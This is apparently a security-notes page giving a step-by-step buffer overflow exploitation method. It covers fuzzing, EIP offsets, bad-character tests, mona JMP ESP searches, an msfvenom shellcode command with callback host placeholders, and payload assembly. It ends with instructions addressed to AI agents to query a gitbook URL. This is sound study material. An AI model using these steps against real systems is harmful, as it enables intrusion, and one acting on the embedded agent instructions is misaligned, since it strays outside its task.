# BOF ## Buffer overflow ### Fuzzing Send increasingly long string to vulnerable field until the application crashes because the EIP registry has been overwritten. The string length will be the size of the payload. ### Find EIP address ``` msf-pattern_create -l msf-pattern_offset -q -l ``` Generate and send a string to the vulnerable application to replicate the crash. Once the application crashes use the debugger to read the bytes stored in the EIP register and use them to find the offset of the register from the injection point ### Find writable area offset It is needed to use a register to store the code to be executed at crash time. To do so we have to find a register that references an area of memory we have reserved for our script (the ‘C’ area). After submitting the following payload: ``` payload = 'A' * + 'B' * 4 + 'C' * ( - 4 - ) ``` Find a register that points to an area written with ‘C’s: ``` offset = 4*(number of 'C' rows between ESI address and the row of 'B's pointed by ESP) available bytes = number of consecutive 'C's in and after the referenced address ``` ### Check for space After calculating the starting offset, see how much space you have available by trying to inject several extra lines of ‘D’s that represent your actual payload position: ``` payload = "A" * + "B" * 4 + "C" * + "D" * 1500 ``` If the available space is not enough to store the exploit see **Bof with first stage payload** ### Check for bad chars #### String for tests ``` badchars = ( "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" ) ``` #### known bad chars: ``` Null char: \x00 Line feed: \x0A HTTP POST field term: \x0D ``` #### Procedure: 1. Send the badchars string to the target machine. 2. When the program crashes use the debugger to access the memory dump and read at which char the execution stopped. 3. The character next to the last in memory is a bad one, remove it from the badchars string and send it again 4. Repeat steps 1-3 until the application crashes after processing the whole string. ### Redirect execution ``` !mona modules !mona find -s "" -m ".dll" #for jmp esp is \xff\xe4 #OR to search in all modules !mona jmp -r esp -m .exe ``` Use Immunity's mona shell to find the position of an exploitable JMP ESP instruction (we want ESP register because it points to the top of the stack). A suitable address must not contain bad chars, and be stored in a library without memory protection systems in place and without bad chars in its base address. When storing the address check for endianness: if the system is little endian invert the bytes' order. #### Get opcodes ``` msf-nasm_shell jmp esp ``` ### Assemble payload #### Generate shellcode If msfvenom is not able to generate a payload, remove the encoder option (-e) in this way the payload generator will automatically pick the best encoder to work with the given badchars. ``` msfvenom -p LHOST= LPORT= -f py -v shellcode -b "\x00\" EXITFUNC=thread ``` #### Assemble payload ``` shellcode = ("") padding = 'A'* eip = #address is in little endian: \x31\x17\x12\xf3 --> \xf3\x12\x17\x31 offset = 'C'* nops = '\x90' * - len(shellcode))> payload = padding+eip+offset+nops+shellcode ``` ## BoF with first stage payload If the ESP register is too small to store the whole payload it will store the first stage payload and from there the execution will be redirected to the actual exploit code stored in another register pointing at the top of the stack. ### First stage payload Once a suitable register is found we have to add our instructions after the data stored. The following instructions will be executed from the ESP register in order to redirect the execution to the exploit #### payload: ``` msf-nasm-shell add jmp ``` The payload is formed by the generated hex strings joined together ### Assemble payload The procedure for the rest of the exploit is the same as before, the only difference is that you have to account for the first stage payload when assembling the exploit ``` nops = "\x90" * shellcode = ("") padding = "\x41" * (-len(nops)–len(shellcode)) eip = "<4 bytes addr>" first_stage = "" buffer = nops + shellcode + padding + eip + first_stage ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://security-notes.gitbook.io/security-notes/resources/bof.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.